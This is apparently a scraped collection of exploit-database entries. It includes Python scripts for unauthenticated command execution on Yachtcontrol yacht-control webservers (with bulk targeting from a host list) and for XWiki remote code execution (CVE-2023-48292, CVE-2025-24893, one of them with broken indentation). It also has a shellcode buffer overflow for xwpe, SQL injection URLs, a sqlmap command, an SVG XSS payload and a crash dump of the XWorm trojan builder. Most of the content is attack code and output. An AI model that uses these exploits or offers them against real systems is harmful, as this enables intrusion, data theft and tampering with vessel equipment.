# Date: 2019-12-06
# Exploit Author: Hodorsec
# Vendor Homepage: http://www.yachtcontrol.nl/en/
# Version: 1.0
# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06. No versioning system detected.
# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
# CVE: N/A
# 
# Description Product:
# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication, 
# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components. 
# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
#
# Description Vulnerability: 
# It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" 
# page and parameter, where {COMMAND} will be executed and returning the results to the client. 
# 
# Affected Components:
# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.

#!/usr/bin/python
import sys,os,requests

# Check arguments
if len(sys.argv) != 5:
    print "Error: enter at least one IP/FQDN as argument. Exiting..."
    print "\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n"
    exit(0)

# Parameters
host = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]
command = sys.argv[4]
timeout = 10
isFile = False

# Check for file or single IP/FQDN
if os.path.isfile(host):
    isFile = True
    with open(host) as f:
        targets = f.readlines()

# Vulnerable page
page = "/pages/systemcall.php?command="

# HTTP or HTTPS
if proto == "http":
    proto = "http://"
elif proto == "https":
    proto = "https://"
else:
    print "\nInvalid method given: enter http or https\n"
    exit(0)

# Do the request
if isFile:
    for host in targets:
        target = host.strip()
        print target
        try:
            response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
            print(response.content.replace('executing command: ' + command,''))
        except requests.exceptions.Timeout:
            print "Timed out."
            pass
        except requests.exceptions.RequestException as e:
            print "Host not found."
            pass
else:
    try:
        response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout)
        print(response.content.replace('executing command: ' + command,''))
    except requests.exceptions.Timeout:
        print "Timed out."
        pass
    except requests.exceptions.RequestException as e:
        print "Host not found."
        pass

#  Disclosure Timeline using CERT/CC disclosure policy:
#  - 06-10-19: Requested CVE
#  - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
#  - 12-10-19: Sent reminder due to no response
#  - 06-11-19: Sent second reminder due to no response
#  - 08-11-19: Received response requesting information, sent information
#  - 11-11-19: Correspondence concerning vulnerability
#  - 25-11-19: Sent reminder of publishing PoC to vendor, received response
#  - 05-12-19: Sent final reminder of publishing PoC to vendor
#  - 06-12-19: Public Disclosure
HireHackking 
# # # # # 
# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yacht-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
# Etc..
# # # # #
HireHackking 
# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://xyzscripts.com/
# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-12

Product & Service Introduction:
===============================
XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.

Technical Details & Description:
================================

SQL injection on [view] URI parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)

==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP:
0x42434441
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while
running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0  0x42434441 in ?? ()
#1  0x4f4e2041 in ?? ()
#2  0x61732054 in ?? ()
#3  0x21646576 in ?? ()
#4  0x206f440a in ?? ()
#5  0x20756f79 in ?? ()
#6  0x746e6177 in ?? ()
#7  0x206f7420 in ?? ()
#8  0x65766173 in ?? ()
#9  0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()iles  ESC-F3 Close W.  F4 Search  ^L S.Again  ESC-X
Quit

#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()

import os,subprocess
def run():
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
run()
HireHackking 
#Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS
# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
# Software Link: N/A# Version: 2.1# Tested on: Windows 10
# CVE : N/A

==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================
The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control.
==================================================================
WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES
==================================================================
(160.b98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c
eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
builder!XWorm.Client.isDisconnected+0xa9:
078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=????????
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

MethodDesc:   055a86b4
Method Name:  XWorm.Client.isDisconnected()
Class:        09fe9634
MethodTable:  055a86d8
mdToken:      06000730
Module:       01464044
IsJitted:     yes
CodeAddr:     078f59b0
Transparency: Critical
MethodDesc:   055a86b4
Method Name:  XWorm.Client.isDisconnected()
Class:        09fe9634
MethodTable:  055a86d8
mdToken:      06000730
Module:       01464044
IsJitted:     yes
CodeAddr:     078f59b0
Transparency: Critical
Failed to request MethodData, not in JIT code range

KEY_VALUES_STRING: 1

    Key  : AV.Dereference
    Value: NullPtr

    Key  : AV.Fault
    Value: Read

    Key  : Analysis.CPU.mSec
    Value: 6406

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 12344

    Key  : Analysis.IO.Other.Mb
    Value: 152

    Key  : Analysis.IO.Read.Mb
    Value: 3

    Key  : Analysis.IO.Write.Mb
    Value: 181

    Key  : Analysis.Init.CPU.mSec
    Value: 48905

    Key  : Analysis.Init.Elapsed.mSec
    Value: 6346579

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 200

    Key  : CLR.BuiltBy
    Value: NET48REL1LAST_C

    Key  : CLR.Engine
    Value: CLR

    Key  : CLR.Version
    Value: 4.8.4515.0

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 7496

    Key  : Timeline.Process.Start.DeltaSec
    Value: 6371

    Key  : WER.OS.Branch
    Value: vb_release

    Key  : WER.OS.Timestamp
    Value: 2019-12-06T14:06:00Z

    Key  : WER.OS.Version
    Value: 10.0.19041.1

    Key  : WER.Process.Version
    Value: 2.1.0.0


NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000000
Attempt to read from address 00000000

FAULTING_THREAD:  00000b98

PROCESS_NAME:  builder.exe

READ_ADDRESS:  00000000 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  00000000

IP_ON_HEAP:  078f5a59
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

STACK_TEXT:  
0113e568 73140556     00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9
0113e574 7314373a     0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113e5c8 7321f0d1     c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b
0113e608 7321f1d6     731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55
0113e90c 7212853c     00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838
0113e930 72114a9d     00000000 00000000 00000000 mscorlib_ni!
0113e94c 6e14bf55     00000000 00000000 00000000 mscorlib_ni!
0113e968 6e14be68     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e990 72118604     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e9f4 72118537     00000000 00000000 00000000 mscorlib_ni!
0113ea08 721184f4     00000000 00000000 00000000 mscorlib_ni!
0113ea24 6e14bdfa     00000000 00000000 00000000 mscorlib_ni!
0113ea40 6e14bb9a     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ea80 6e13b07f     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eacc 6e144931     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ead8 6e1445f7     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaec 6e13af53     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaf4 6e13aee5     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb08 6e13a820     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb58 0146d08e     00000000 00000000 00000000 System_Windows_Forms_ni!
WARNING: Frame IP not in any known module. Following frames may be wrong.
0113eb8c 7650148b     000606f4 0000c250 00000000 0x146d08e
0113ebb8 764f844a     05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b
0113ec9c 764f61ba     05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a
0113ed10 764f5f80     0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a
0113ed1c 6e19e5ed     0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10
0113ed58 6e14b44f     00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed
0113eddc 6e14b03d     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee30 6e14ae93     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee5c 014b2694     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee84 014b2211     00000000 00000000 00000000 0x14b2694
0113eeac 014b1871     00000000 00000000 00000000 0x14b2211
0113eef8 014b08b7     00000000 00000000 00000000 0x14b1871
0113ef28 73140556     00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f
0113ef34 7314373a     0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113ef88 73149adb     00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b
0113eff0 732bff7b     0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a
0113f114 732c065a     0113f158 00000000 c8874096 clr!RunMain+0x1b3
0113f380 732c0587     00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7
0113f864 732c0708     c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef
0113f8bc 732c082e     c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c
0113f8fc 732bc235     c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc
0113f938 7398fa84     84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d
0113f970 73a1e81e     73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6
0113f980 73a24338     73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e
0113f998 76b600f9     00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8
0113f998 77997bbe     00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19
0113f9f4 77997b8e     ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f
0113fa04 00000000     00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  ~0s ; .cxr ; kb

SYMBOL_NAME:  builder!XWorm.Client.isDisconnected+a9

MODULE_NAME: builder

IMAGE_NAME:  builder.exe

FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x86

OSNAME:  Windows 10

IMAGE_VERSION:  2.1.0.0

FAILURE_ID_HASH:  {ab0d02c5-881b-c628-2858-a241c5c41b1f}

Followup:     MachineOwner
---------

TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)
HireHackking 
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292

from argparse import ArgumentParser
import sys
import logging
from requests import get, post, RequestException
import validators

# Constants
CVE_NAME = "CVE-2023-48292"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}

# Configure logging
def setup_logging(logfile):
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)

    # Create a logging handler for console output
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(console_handler)

    # Create a logging handler for file output
    file_handler = logging.FileHandler(logfile)
    file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(file_handler)

def validate_url(url):
    """
    Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
    """
    if not validators.url(url):
        logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
        sys.exit(1)
    return url.rstrip("/")

def check_vulnerability(target_url, method):
    """
    Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
    We send a test payload and inspect the response to determine if the vulnerability exists.
    """
    try:
        # Test payload to check for vulnerability
        test_payload = "echo 'testtesttest1234'"  # Payload to execute a test command on the target system
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200 and "testtesttest1234" in response.text:
            logging.info("Target is vulnerable! Command execution test succeeded.")
            return True
        else:
            logging.info("Target does not appear to be vulnerable.")
            return False
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def perform_attack(target_url, payload, method):
    """
    Perform the attack by sending a custom payload to the vulnerable server.
    """
    try:
        logging.info(f"Attempting attack with payload: {payload}")
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200:
            logging.info(f"Attack successful! Response: {response.text[:100]}...")  # Display a snippet of the response
        else:
            logging.warning("Attack attempt failed.")
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def main():
    """
    Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
    """
    parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
    parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
    parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
    parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
    parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
    parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
    args = parser.parse_args()

    # Set up logging to file and console
    setup_logging(args.logfile)

    # Validate the target URL
    target_url = validate_url(args.target)

    logging.info("Checking the target for vulnerability...")
    if check_vulnerability(target_url, args.method):
        if args.exploit:
            # Perform the attack with the provided payload
            perform_attack(target_url, args.payload, args.method)
        else:
            logging.info("Run with '--exploit' to attempt the attack.")
    else:
        logging.warning("The target is not vulnerable. Exiting.")

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: XWiki Platform - Remote Code Execution
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-24893
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://github.com/xwiki/xwiki-platform
# Version: Affected versions up to and including XWiki 15.10.10
# Tested Versions: XWiki 15.10.10
# Vulnerability Type: Remote Code Execution (RCE)
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Description:
# XWiki Platform suffers from a critical vulnerability where any guest user
can
# execute arbitrary code remotely through the SolrSearch endpoint. This can
lead
# to a full server compromise, including the ability to execute commands on
the
# underlying system. The vulnerability impacts the confidentiality,
integrity,
# and availability of the XWiki installation. The issue has been patched in
XWiki
# versions 15.10.11, 16.4.1, and 16.5.0RC1.
# Proof of Concept: Yes
# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
# References:
# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
# - GitHub Exploit Link:
https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py

import requests

# Banner
def display_banner():
print("="*80)
print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code
Execution")
print("Exploit Author: Al Baradi Joy")
print("GitHub Exploit:
https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
print("="*80)

# Function to detect the target protocol (HTTP or HTTPS)
def detect_protocol(domain):
https_url = f"https://{domain}"
http_url = f"http://{domain}"

try:
response = requests.get(https_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[] Target supports HTTPS: {https_url}")
return https_url
except requests.exceptions.RequestException:
print("[!] HTTPS not available, falling back to HTTP.")

try:
response = requests.get(http_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[] Target supports HTTP: {http_url}")
return http_url
except requests.exceptions.RequestException:
print("[] Target is unreachable on both HTTP and HTTPS.")
exit(1)

# Exploit function
def exploit(target_url):
target_url = detect_protocol(target_url.replace("http://",
"").replace("https://", "").strip())
exploit_url =
f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"

try:
print(f"[+] Sending request to: {exploit_url}")
response = requests.get(exploit_url, timeout=10)

# Check if the exploit was successful
if response.status_code == 200 and "root:" in response.text:
print("[] Exploit successful! Output received:")
print(response.text)
else:
print(f"[] Exploit failed. Status code:
{response.status_code}")

except requests.exceptions.ConnectionError:
print("[] Connection failed. Target may be down.")
except requests.exceptions.Timeout:
print("[] Request timed out. Target is slow or unresponsive.")
except requests.exceptions.RequestException as e:
print(f"[] Unexpected error: {e}")

# Main execution
if __name__ == "__main__":
display_banner()
target = input("[?] Enter the target URL (without http/https):
").strip()
exploit(target)
HireHackking 
# Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
# Date: 17-01-2021
# Exploit Author: Karan Keswani
# Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: Xwiki CMS- 12.10.2
# Tested on: Windows 10

# Description: XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.

# Additional Information:
Well I found this vulnerability in Xwiki project based websites but they did not respond so i installed a latest version of Xwiki CMS and hosted on localhost with help of Wamp and then i exploited that vulnerability.

# Attack Vector:
1) Create 2 accounts:- 1)Victim & 2)Attacker
2) Login with victim account, there is a option to create new dashboard and there is page says give title and type.( Type of Dashboard:-I created simple page)
3) Now save view the page,
4) Now login with attacker account and search and open the dashboard which has been created by victim,
5) When you open the dashboard there is a comment section option, Go to that comment section & add a comment,there is a upload functionality,
6) So i tried to upload a sample svg file to check that it will allow to upload .svg format
7) Now i created a text file with XSS payload and then saved it as a .svg format
8) Upload your .svg file and click on send it to the server and click ok (your comment will be add)
9) Now open that comment with the victim account and click on that view image you'll see the xss pop-up.

Xss Payload:-
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg

onload="alert('xss')"
 xmlns="http://www.w3.org/2000/svg">
</svg>
HireHackking 
# Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php. For details, please refer to:
https://github.com/cbkhwx/cxuucmsv3/issues/1

Use SQLMAP authentication:
 sqlmap -u 'http://localhost/search.php?keywords=12345678'
--dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o
--batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121
Safari/537.36' -b  --current-db --hostname